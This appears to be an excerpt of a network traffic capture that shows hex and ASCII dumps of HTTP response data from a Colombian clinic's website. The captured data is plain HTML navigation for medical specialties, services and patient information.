                                                                                                                                                                                                                                                        Data Ascii: av-item ps-2 "><a class="nav-link" href="nosotros/politicas-institucionales" target="_self">Polticas Institucionales</a></li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8206INData Raw: 65 74 3d 22 5f 73 65 6c 66 22 3e 47 6f 62 69 65 72 6e 6f 20 43 6f 72 70 6f 72 61 74 69 76 6f 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 6e 6f 73 6f 74 72 6f 73 2f 73 69 73 74 65 6d 61 2d 64 65 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 74 65 72
                                                                                                                                                                                                                                                        Data Ascii: et="_self">Gobierno Corporativo</a></li> <li class="nav-item ps-2 "><a class="nav-link" href="nosotros/sistema-de-control-inter
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8207INData Raw: 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 6e 6f 73 6f 74 72 6f 73 2f 70 61 72 74 69 63 69 70 61 63 69 6f 6e 2d 73 6f 63 69 61 6c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 50 61 72 74 69 63 69 70 61 63 69 c3 b3 6e 20 53 6f 63 69 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: class="nav-link" href="nosotros/participacion-social" target="_self">Participacin Social</a></li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8209INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 23 73 75 62 73 75 62 6d 65 6e 75 2d 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 50 65 64 69 c3 a1 74 72 69 63 61 73 20 3c 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 61 6e 67 6c 65 2d 64 6f 77 6e 20 70 6f 73 69 74 69 6f 6e 2d 73 74 61 74 69 63 20 6d 73 2d 32 22 3e 3c 2f 69 3e 3c 2f 61 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61
                                                                                                                                                                                                                                                        Data Ascii: href="#subsubmenu-0"> Peditricas <i class="fa fa-angle-down position-static ms-2"></i></a> <ul cla
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8210INData Raw: 6e 61 76 2d 6c 69 6e 6b 22 3e 55 72 6f 6c 6f 67 c3 ad 61 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 69 6e 66 65 63 74 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: nav-link">Urologa</a> </li> <li class="nav-item ps-2 "><a href="especialidades/pediatricas/infectologia"
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8211INData Raw: 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 68 65 6d 61 74 6f 2d 6f 6e 63 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 3e 48 65 6d 61 74 6f 20 2d 20 4f 6e 63 6f 6c 6f 67 c3 ad 61 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: ="especialidades/pediatricas/hemato-oncologia" target="_self" class="nav-link">Hemato - Oncologa</a>
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8213INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 65 6e 64 6f 63 72 69 6e 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: </li> <li class="nav-item ps-2 "><a href="especialidades/pediatricas/endocrinologia"
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8214INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 3e 4f 72 74 6f 70 65 64 69 61 20 6f 6e 63 6f 6c c3 b3 67 69 63 61 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: target="_self" class="nav-link">Ortopedia oncolgica</a> </li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8215INData Raw: 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 23 73 75 62 73 75 62 6d 65 6e 75 2d 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 47 69 6e 65 63 6f 62 73 74 65 74 72 69 63 69 61 73 20 3c 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 61 6e 67 6c 65 2d 64 6f 77 6e 20 70 6f 73 69 74 69 6f 6e 2d 73 74 61 74 69 63 20 6d 73 2d 32 22 3e 3c 2f 69 3e 3c 2f 61 3e
                                                                                                                                                                                                                                                        Data Ascii: -bs-toggle="collapse" href="#subsubmenu-1"> Ginecobstetricias <i class="fa fa-angle-down position-static ms-2"></i></a>
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8252INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 63 69 72 75 67 69 61 2f 63 61 72 64 69 6f 76 61 73 63 75 6c 61 72 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <li class="nav-item ps-2 "><a href="servicios/cirugia/cardiovascular" target="_self"
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8257INData Raw: 65 72 76 69 63 69 6f 73 2f 63 69 72 75 67 69 61 2f 75 72 6f 6c 6f 67 69 63 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 3e 55 72 6f 6c c3 b3 67 69 63 61 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: ervicios/cirugia/urologica" target="_self" class="nav-link">Urolgica</a> </li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8260INData Raw: 38 30 30 30 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 2d 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 62 65 74 77 65 65 6e 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 23 73 75 62 73 75 62 6d 65 6e
                                                                                                                                                                                                                                                        Data Ascii: 8000 <li class="nav-item ps-2"> <a class="nav-link d-flex justify-content-between" data-bs-toggle="collapse" href="#subsubmen
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8264INData Raw: 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: </li> </ul> </li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8269INData Raw: 69 63 69 6f 73 2f 61 73 65 73 6f 72 69 61 2d 65 6e 2d 6c 61 63 74 61 6e 63 69 61 2d 6d 61 74 65 72 6e 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 41 73 65 73 6f 72 c3 ad 61 20 65 6e 20 6c 61 63 74 61 6e 63 69 61 20 6d 61 74 65 72 6e 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: icios/asesoria-en-lactancia-materna" target="_self">Asesora en lactancia materna</a></li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8273INData Raw: 3e 3c 61 20 68 72 65 66 3d 22 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 61 6c 2d 70 61 63 69 65 6e 74 65 2f 73 69 73 74 65 6d 61 2d 64 65 2d 69 6e 66 6f 72 6d 61 63 69 6f 6e 2d 79 2d 61 74 65 6e 63 69 6f 6e 2d 61 6c 2d 75 73 75 61 72 69 6f 2d 73 69 61 75 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 3e 53 69 73 74 65 6d 61 20 64 65 20 49 6e 66 6f 72 6d 61
                                                                                                                                                                                                                                                        Data Ascii: ><a href="pacientes/educacion-al-paciente/sistema-de-informacion-y-atencion-al-usuario-siau" target="_self" class="nav-link">Sistema de Informa
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8277INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 68 72 65 66 3d 22 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 61 6c 2d 70 61 63 69 65 6e 74 65 2f 76 61 63 75 6e 61 63 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: </li> <li class="nav-item ps-2 "><a href="pacientes/educacion-al-paciente/vacunacion"
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8281INData Raw: 6d 20 70 73 2d 32 20 22 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 63 6f 6e 74 61 63 74 6f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 43 6f 6e 74 c3 a1 63 74 61 6e 6f 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: m ps-2 "><a class="nav-link" href="https://www.clinicasanluis.com.co/contacto" target="_self">Contctanos</a></li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8285INData Raw: 52 4b 45 4e 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 4c 49 44 45 20 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c
                                                                                                                                                                                                                                                        Data Ascii: RKEN --> </li> ... SLIDE --> <l
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8289INData Raw: 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 69 6d 61 67 65 73 2f 63 61 62 65 7a 6f 74 65 73 2d 6d 6f 62 69 6c 65 2f 77 65 62 2d 36 39 36 2d 35 37 37 2d 39 37 34 2e 77 65 62 70 22 20 61 6c 74 3d 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 6c 61 7a 79 6c 6f 61 64 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 69 6d 61 67 65 73 2f 63 61 62 65 7a 6f 74 65 73 2d 6d 6f 62 69 6c 65 2f 77 65 62 2d 36 39 36 2d 35 37 37 2d 39 37 34 2e 77 65 62 70 22 20 64 61 74 61 2d 6b 65 6e 62 75 72 6e 7a 6f 6f 6d 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e
                                                                                                                                                                                                                                                        Data Ascii: g src="https://www.clinicasanluis.com.co/images/cabezotes-mobile/web-696-577-974.webp" alt="" data-lazyload="https://www.clinicasanluis.com.co/images/cabezotes-mobile/web-696-577-974.webp" data-kenburnzoom="https://www.clin
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8292INData Raw: 38 30 30 30 0d 0a 70 20 63 6c 61 73 73 3d 22 70 71 2d 66 61 6e 63 79 62 6f 78 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 70 71 2d 62 75 74 74 6f 6e 20 70 71 2d 62 75 74 74 6f 6e 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 63 6f 6e 74 61 63 74 6f 2f 61 67 65 6e 64 61 2d 74 75 2d 63 69 74 61 22 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: 8000p class="pq-fancybox-description"> </p> <a class="pq-button pq-button-link" href="https://www.clinicasanluis.com.co/contacto/agenda-tu-cita"
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8296INData Raw: 77 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 36 20 70 65 2d 78 6c 2d 35 73 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 73 74 61 72 74 22 3e 20 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 77 65 62 2d 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2d 31 36 39 34 31 37 34 37 36 38 2d 71 36 69 64 73 2e 77 65 62 70 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 74 69 74 6c 65 3d 22 43 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 22
                                                                                                                                                                                                                                                        Data Ascii: w align-items-center"> <div class="col-lg-6 pe-xl-5s align-self-start"> <img src="images/home/web-clinicasanluis-1694174768-q6ids.webp" alt="Clinicasanluis" loading="lazy" title="Clinicasanluis"
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8301INData Raw: 74 6c 65 22 3e 41 70 6f 79 6f 20 64 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 68 35 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: tle">Apoyo diagnstico</h5> </a> </div> </div> </div> </div>
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8305INData Raw: 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 73 65 72 76 69 63 65 2d 62 6f 78 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: " class="img-fluid"> </a> </div> <div class="pq-service-box-info">
